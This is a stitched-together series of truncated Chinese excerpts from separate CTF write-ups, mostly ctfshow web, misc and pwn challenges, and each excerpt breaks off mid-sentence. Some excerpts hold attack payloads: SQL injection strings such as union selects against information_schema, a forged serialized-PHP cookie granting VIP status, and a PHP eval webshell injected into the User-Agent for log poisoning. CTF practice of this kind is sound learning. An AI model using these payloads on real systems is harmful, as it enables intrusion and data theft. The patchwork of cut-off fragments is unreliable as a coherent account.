web1 题目:开发注释未及时删除 查看页面源代码即可 web2 题目:js把鼠标右键和f12屏蔽了 方法一: 禁用JavaScript 方法二: url前面加上view-source: web3 题目:抓个包试试 抓包在请求包发现flag web4 题目:总有人把后台地址写入robots 访问robots.txt后得到后台地址,访问得到flag web5
pwn 正所谓万事开头难,打开这篇文章也将可能成为你进入pwn世界的叩门石。由于本文过于详细,会耽搁大佬很多时间,同时本人学识尚浅,如有错误请指正。 我们先打开题目 launch an instance创建容器,创建容器后就会显示相应的host与port stack是可以下载的附件,就是我们要寻找漏洞的程序,点
目录 源码思路题解总结 源码 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19 思路 根据提示,源码中可能存在highlight_file()函数,然后在php.ini中禁用了highlight_file().源码应该还是上题的. include和
目录 源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc中文识别带师 2.Web简单的验证码easyPOP 3.Pwnpwn01-My_sword_is_readypwn02-Precision_and_grace 4.Osint英语阅读这是哪里卡鲁铁盒人家想玩嘛人有点多
文章目录 web1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web20 web1 直接查看源代码就可以看到flag web2 无法直接查看源代码了 在url前加上view-source: flag就在源代码中 web3 同样看不到源码,根据提示那就抓个包 出flag
前置知识: jwt(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完 整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的 信息,JWT可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递 声
ctfshow-web37 文章目录 ctfshow-web37题目描述:原理:审计: 方法:思路:利用文件按包含漏洞,data协议 Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 20
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password']
web254 ?username=xxxxxx&password=xxxxxx web255 cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D web256 cookie: O%3A11%3A%
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['
文章目录 Misc1Misc2Misc3Misc4Misc5Misc6Misc7Misc8Misc9Misc10Misc11Misc12Misc13Misc14Misc15Misc16Misc17Misc18Misc19Misc20Misc21Misc22Misc23Misc41 Misc1 很明显 Misc2 打开文本后发现大量乱码,010查看后是png 修改后缀拿到flag Misc3 bpg格式图片,推荐使用蜂蜜浏
打开页面,发现下面这段提示 按照惯例,先看一下网页源码,找到flag
审计代码发现 需要v1是字符串,v2是数字 PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 所以只要v1与v2的md5值以0E开头即可。这样最后php解析到的v1和v2的md5值就都是0了 构造v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD50e开头的md5和
打开之后发现和web3有点像,但是用之前的方法做不出来了 传参url=/var/log/nginx/access.log获取日志目录 使用burpsuite抓包 在User-Agent中加入一句话木马 <?php @eval($_POST['a'];?> 使用蚁剑连接 得到flag ctfshow{f755138b-0c50-45
ctfshow misc 图片继承篇 以下题目均来自ctfshow,本鸟人才瘾大,若有错误,望大佬们指出 misc 1 下载下来得到一张图片,图片内容就是flag。 misc 2 下载解压后得到的是一个misc2.txt,记住misc体不要相信题目所给附件的后缀,直接使用记事本打开得到一堆乱码的数据,那我们使用winhex打开,发现
web签到题 查看源代码: base64解码即可: web2 题目提示:最简单的sql注入 使用admin’or 1=1#登录成功 admin’ union select 1,2,3# 获得注入位置 admin’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(_
文件下载地址 https://www.lanzoui.com/i98mzhg 打开之后是一个MP3文件,各种音频隐写尝试后,并没有用 在kail中使用foremost分离出一个图片 可以发现图片的高并不是很完整 使用010打开图片,修改图片的高 再次打开后发现猪圈密码 猪圈密码 得出flag
前言 跟进一步增强php的代码审计能力,了解tp框架 从最基础的开始学习,目的不是为了一把梭,而是要明白它的原理和设计思路,为我们以后自主调试挖洞打下基础 web569——路由 本题使用的版本为3.2.3 ThinkPHP3.2.3完全开发手册-架构-URL模式 入口文件是应用的单一入口,对应用的所有
WEB89 题目: <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
代码审计 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2021-05-31 13:40:37 # @Last Modified by: h1xa # @Last Modified time: 2021-05-31 16:36:27 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); class fileUtil{
有4个段子,查看前端没思路,开扫描 发现存在admin目录 发现存在注入 fuzz测试一波 发现括号 | 没过滤,其他比如 or and & # -- 啥的全都过滤了,而||就是or,有or就可以注入 首先测试观察可知,输入admin,密码随便输入会提示密码错误,反之会提示 用户名/密码错
文件上传 还是是一边学习一边做笔记的文章,由于是学习,所以会显得啰嗦 还请各位师傅担待~ 如果有不正确的地方,请师傅们斧正谢谢师傅们 web150 火狐关闭js的插件一旦开启,就没法点击上传按钮了。 而且这里没法上传.php .jpg等后缀文件,只能选择png格式图片。所以只能以够抓包然后修改内
title: CTFSHOW-sql注入(一) data: 2021-09-15 tags: CTF-web CTFSHOW sql注入(一) 开始一周的高强度sql注入训练,先从ctfshow 的基础开始。 包含了CTFSHOW sql注入的 170-200题。 这里都是sql注入的一些基本知识点。主要是了解sql注入的常见题型。 题目 web 171(万能密码)